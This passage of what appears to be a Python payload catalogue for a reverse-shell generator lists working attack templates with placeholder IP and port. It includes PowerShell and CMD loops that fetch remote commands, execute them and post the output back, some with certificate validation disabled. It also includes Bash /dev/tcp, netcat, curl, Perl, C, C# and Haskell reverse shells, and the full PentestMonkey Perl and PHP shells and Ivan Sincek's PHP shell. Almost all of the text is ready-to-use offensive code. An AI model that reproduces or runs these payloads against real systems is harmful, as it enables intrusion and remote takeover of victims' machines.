        "command": '@echo off&cmd /V:ON /C "SET ip={ip}:{port}&&SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1" > NUL',
        "meta": ["windows"],
    },
    {
        "name": "PowerShell IEX",
        "command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell IEX Constr Lang Mode",
        "command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell Outfile",
        "command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\\Users\\$env:USERNAME\\.local\\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell Outfile Constr Lang Mode",
        "command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\\Users\\$env:USERNAME\\.local\\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "Windows CMD cURL https",
        "command": '@echo off&cmd /V:ON /C "SET ip={ip}:{port}&&SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1" > NUL',
        "meta": ["windows"],
    },
    {
        "name": "PowerShell IEX https",
        "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell Constr Lang Mode IEX https",
        "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell Outfile https",
        "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\\Users\\$env:USERNAME\\.local\\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
        "meta": ["windows"],
    },
    {
        "name": "PowerShell Outfile Constr Lang Mode https",
        "command": 'add-type @"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s=\'{ip}:{port}\';$i=\'e030d4f6-9393dc2a-dd9e00a7\';$p=\'https://\';$f="C:\\Users\\$env:USERNAME\\.local\\hack.ps1";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{"Authorization"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{"Authorization"=$i}); if ($c -eq \'exit\') {del $f;exit} elseif ($c -ne \'None\') {echo "$c" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{"Authorization"=$i} -Body ($e+$r)} sleep 0.8}',
        "meta": ["windows"],
    },
]

reverse_shell = [
    {
        "name": "Bash -i",
        "command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Bash 196",
        "command": "0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Bash read line",
        "command": "exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Bash 5",
        "command": "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Bash udp",
        "command": "{shell} -i >& /dev/udp/{ip}/{port} 0>&1",
        "meta": ["linux", "mac"],
    },
    {
        "name": "nc mkfifo",
        "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
        "meta": ["linux", "mac"],
    },
    {"name": "nc -e", "command": "nc {ip} {port} -e {shell}", "meta": ["linux", "mac"]},
    {
        "name": "nc.exe -e",
        "command": "nc.exe {ip} {port} -e {shell}",
        "meta": ["windows"],
    },
    {
        "name": "BusyBox nc -e",
        "command": "busybox nc {ip} {port} -e {shell}",
        "meta": ["linux"],
    },
    {"name": "nc -c", "command": "nc -c {shell} {ip} {port}", "meta": ["linux", "mac"]},
    {
        "name": "ncat -e",
        "command": "ncat {ip} {port} -e {shell}",
        "meta": ["linux", "mac"],
    },
    {
        "name": "ncat.exe -e",
        "command": "ncat.exe {ip} {port} -e {shell}",
        "meta": ["windows"],
    },
    {
        "name": "ncat udp",
        "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u {ip} {port} >/tmp/f",
        "meta": ["linux", "mac"],
    },
    {
        "name": "curl",
        "command": "C='curl -Ns telnet://{ip}:{port}'; $C </dev/null 2>&1 | {shell} 2>&1 | $C >/dev/null",
        "meta": ["linux", "mac"],
    },
    {
        "name": "rustcat",
        "command": "rcat connect -s {shell} {ip} {port}",
        "meta": ["linux", "mac"],
    },
    {
        "name": "C",
        "command": '#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n    int port = {port};\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;       \n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr("{ip}");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr, \n    sizeof(revsockaddr));\n    dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {"{shell}", NULL};\n    execve("{shell}", argv, NULL);\n\n    return 0;       \n}',
        "meta": ["linux", "mac"],
    },
    {
        "name": "C Windows",
        "command": '#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,"ws2_32")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = "{ip}"; \r\nchar port[6] = "{port}";            \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n    WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);\r\n\r\n\r\n    struct hostent *host; \r\n    host = gethostbyname(ip_addr);\r\n    strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n    hax.sin_family = AF_INET;\r\n    hax.sin_port = htons(atoi(port));\r\n    hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n    memset(&ini_processo, 0, sizeof(ini_processo));\r\n    ini_processo.cb = sizeof(ini_processo);\r\n    ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n    ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n    TCHAR cmd[255] = TEXT("cmd.exe");\r\n\r\n    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n    return 0;\r\n}',
        "meta": ["windows"],
    },
    {
        "name": "C# TCP Client",
        "command": 'using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient("{ip}", {port}))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = "{shell}";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append("\\n");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n        {\n            StringBuilder strOutput = new StringBuilder();\n\n            if (!String.IsNullOrEmpty(outLine.Data))\n            {\n                try\n                {\n                    strOutput.Append(outLine.Data);\n                    streamWriter.WriteLine(strOutput);\n                    streamWriter.Flush();\n                }\n                catch (Exception err) { }\n            }\n        }\n\n\t}\n}',
        "meta": ["linux", "windows"],
    },
    {
        "name": "C# Bash -i",
        "command": 'using System;\nusing System.Diagnostics;\n\nnamespace BackConnect {\n  class ReverseBash {\n\tpublic static void Main(string[] args) {\n\t  Process proc = new System.Diagnostics.Process();\n\t  proc.StartInfo.FileName = "{shell}";\n\t  proc.StartInfo.Arguments = "-c \\"{shell} -i >& /dev/tcp/{ip}/{port} 0>&1\\"";\n\t  proc.StartInfo.UseShellExecute = false;\n\t  proc.StartInfo.RedirectStandardOutput = true;\n\t  proc.Start();\n\n\t  while (!proc.StandardOutput.EndOfStream) {\n\t\tConsole.WriteLine(proc.StandardOutput.ReadLine());\n\t  }\n\t}\n  }\n}\n',
        "meta": ["linux", "windows"],
    },
    {
        "name": "Haskell #1",
        "command": 'module Main where\n\nimport System.Process\n\nmain = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f"',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Perl",
        "command": 'perl -e \'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("{shell} -i");};\'',
        "meta": ["linux", "mac"],
    },
    {
        "name": "Perl no sh",
        "command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
        "meta": ["linux", "mac"],
    },
    {
        "name": "Perl PentestMonkey",
        "command": '#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only.  Users take full responsibility\n# for any actions performed using this tool.  The author accepts no liability\n# for damage caused by this tool.  If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only.  Users take full responsibility\n# for any actions performed using this tool.  If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell.  Change these.\nmy $ip = \'{ip}\';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth   = 0; # 0 means authentication is disabled and any \n		# source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{\'REMOTE_ADDR\'})) {\n\tcgiprint("Browser IP address appears to be: $ENV{\'REMOTE_ADDR\'}");\n\n\tif ($auth) {\n\t\tunless ($ENV{\'REMOTE_ADDR\'} =~ $authorised_client_pattern) {\n\t\t\tcgiprint("ERROR: Your client isn\'t authorised to view this page");\n\t\t\tcgiexit();\n\t\t}\n\t}\n} elsif ($auth) {\n\tcgiprint("ERROR: Authentication is enabled, but I couldn\'t determine your IP address.  Denying access");\n\tcgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n\tmy $pid = fork();\n\tif ($pid) {\n\t\tcgiexit(0); # parent exits\n\t}\n\n\tsetsid();\n\tchdir(\'/\');\n\tumask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname(\'tcp\'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n\tcgiprint("Sent reverse shell to $ip:$port");\n\tcgiprintpage();\n} else {\n\tcgiprint("Couldn\'t open reverse shell to $ip:$port: $!");\n\tcgiexit();	\n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{\'HISTFILE\'} = \'/dev/null\';\nsystem("w;uname -a;id;pwd");\nexec("{shell}" ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n\tmy $line = shift;\n\t$line .= "<p>\\n";\n\t$global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n\tcgiprintpage();\n\texit 0; # 0 to ensure we don\'t give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n\tprint "Content-Length: " . length($global_page) . "\\r\\nConnection: close\\r\\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n',
        "meta": ["linux", "mac"],
    },
    {
        "name": "PHP PentestMonkey",
        "command": '<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'{ip}\';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; {shell} -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0);  // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\n}\n\nchdir("/");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit("$errstr ($errno)");\n\texit(1);\n}\n\n$descriptorspec = array(\n   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from\n   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to\n   2 => array("pipe", "w")   // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit("ERROR: Can\'t spawn shell");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit("Successfully opened reverse shell to $ip:$port");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit("ERROR: Shell connection terminated");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit("ERROR: Shell process terminated");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit("SOCK READ");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit("SOCK: $input");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit("STDOUT READ");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit("STDOUT: $input");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit("STDERR READ");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit("STDERR: $input");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint "$string\\n";\n\t}\n}\n\n?>',
        "meta": ["linux", "windows", "mac"],
    },
    {
        "name": "PHP Ivan Sincek",
        "command": "<?php\n// Copyright (c) 2020 Ivan Sincek\n// v2.3\n// Requires PHP v5.0.0 or greater.\n// Works on Linux OS, macOS, and Windows OS.\n// See the original script at https://github.com/pentestmonkey/php-reverse-shell.\nclass Shell {\n    private $addr  = null;\n    private $port  = null;\n    private $os    = null;\n    private $shell = null;\n    private $descriptorspec = array(\n        0 => array('pipe', 'r'), // shell can read from STDIN\n        1 => array('pipe', 'w'), // shell can write to STDOUT\n        2 => array('pipe', 'w')  // shell can write to STDERR\n    );\n    private $buffer  = 1024;    // read/write buffer size\n    private $clen    = 0;       // command length\n    private $error   = false;   // stream read/write error\n    public function __construct($addr, $port) {\n        $this->addr = $addr;\n        $this->port = $port;\n    }\n    private function detect() {\n        $detected = true;\n        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS\n            $this->os    = 'LINUX';\n            $this->shell = '{shell}';\n        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {\n            $this->os    = 'WINDOWS';\n            $this->shell = 'cmd.exe';\n        } else {\n            $detected = false;\n            echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n        }\n        return $detected;\n    }\n    private function daemonize() {\n        $exit = false;\n        if (!function_exists('pcntl_fork')) {\n            echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n        } else if (($pid = @pcntl_fork()) < 0) {\n            echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n        } else if ($pid > 0) {\n            $exit = true;\n            echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n        } else if (posix_setsid() < 0) {\n            // once daemonized you will actually no longer see the script's dump\n            echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n        } else {\n            echo \"DAEMONIZE: Completed successfully!\\n\";\n        }\n        return $exit;\n    }\n    private function settings() {\n        @error_reporting(0);\n        @set_time_limit(0); // do not impose the script execution time limit\n        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n    }\n    private function dump($data) {\n        $data = str_replace('<', '&lt;', $data);\n        $data = str_replace('>', '&gt;', $data);\n        echo $data;\n    }\n    private function read($stream, $name, $buffer) {\n        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n            $this->error = true;                            // set global error flag\n            echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n        }\n        return $data;\n    }\n    private function write($stream, $name, $data) {\n        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n            $this->error = true;                            // set global error flag\n            echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\";\n        }\n        return $bytes;\n    }\n    // read/write method for non-blocking streams\n    private function rw($input, $output, $iname, $oname) {\n        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length\n            $this->dump($data); // script's dump\n        }\n    }\n    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)\n    // we must read the exact byte length from a stream and not a single byte more\n    private function brw($input, $output, $iname, $oname) {\n        $fstat = fstat($input);\n        $size = $fstat['size'];\n        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {\n            // for some reason Windows OS pipes STDIN into STDOUT\n            // we do not like that\n            // we need to discard the data from the stream\n            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {\n                $this->clen -= $bytes;\n                $size -= $bytes;\n            }\n        }\n        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {\n            $size -= $bytes;\n            $this->dump($data); // script's dump\n        }\n    }\n    public function run() {\n        if ($this->detect() && !$this->daemonize()) {\n            $this->settings();\n\n            // ----- SOCKET BEGIN -----\n            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);\n            if (!$socket) {\n                echo \"SOC_ERROR: {$errno}: {$errstr}\\n\";\n            } else {\n                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS\n\n                // ----- SHELL BEGIN -----\n                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);\n                if (!$process) {\n                    echo \"PROC_ERROR: Cannot start the shell\\n\";\n                } else {\n                    foreach ($pipes as $pipe) {\n                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS\n                    }\n\n                    // ----- WORK BEGIN -----\n                    $status = proc_get_status($process);\n                    @fwrite($socket, \"SOCKET: Shell has connected! PID: \" . $status['pid'] . \"\\n\");\n                    do {\n\t\t\t\t\t\t$status = proc_get_status($process);\n                        if (feof($socket)) { // check for end-of-file on SOCKET\n                            echo \"SOC_ERROR: Shell connection has been terminated\\n\"; break;\n                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running\n                            echo \"PROC_ERROR: Shell process has been terminated\\n\";   break; // feof() does not work with blocking streams\n                        }                                                                    // use proc_get_status() instead\n                        $streams = array(\n                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR\n                            'write'  => null,\n                            'except' => null\n                        );\n                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS\n                        if ($num_changed_streams === false) {\n                            echo \"STRM_ERROR: stream_select() failed\\n\"; break;\n                        } else if ($num_changed_streams > 0) {\n                            if ($this->os === 'LINUX') {\n                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN\n                                if (in_array($pipes[2], 